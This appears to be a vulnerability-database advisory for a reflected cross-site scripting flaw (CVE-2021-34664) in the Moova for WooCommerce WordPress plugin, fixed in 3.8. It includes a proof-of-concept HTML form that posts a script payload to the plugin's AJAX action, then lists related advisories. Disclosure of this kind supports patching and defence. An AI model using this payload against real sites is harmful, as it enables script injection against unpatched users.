Moova for WooCommerce < 3.8 – Reflected Cross-Site Scripting | CVE 2021-34664 | Plugin Vulnerabilities

Description

The plugin does not escape the lat parameter of the moova_custom_fields AJAA action (available to both unauthenticated and authenticated users) before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="moova_custom_fields" />
      <input type="hidden" name="lat" value="<script>alert(/XSS/)</script>" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

moova-for-woocommerce

Fixed in 3.8

References

CVE

URL

https://www.wordfence.com/vulnerability-advisories/#CVE-2021-34664

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

p7e4

Verified

Yes

WPVDB ID

5b1d5f4f-fea4-4477-ba55-d0e36f832592

Timeline

Publicly Published

2021-08-13 (about 4 years ago)

Added

2021-08-13 (about 4 years ago)

Last Updated

2023-01-26 (about 3 years ago)

Other

Published

Title

Published

2025-01-16

Title

MACME <= 1.2 - Reflected Cross-Site Scripting

Published

2023-09-27

Title

Snap Pixel < 1.5.8 - Admin+ Stored XSS

Published

2024-02-05

Title

Elementor Addon Elements < 1.12.12 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2014-08-01

Title

Duplicator - installer.cleanup.php package Parameter XSS

Published

2024-03-12

Title

Page Builder Gutenberg Blocks < 3.1.7 - Contributor+ Stored XSS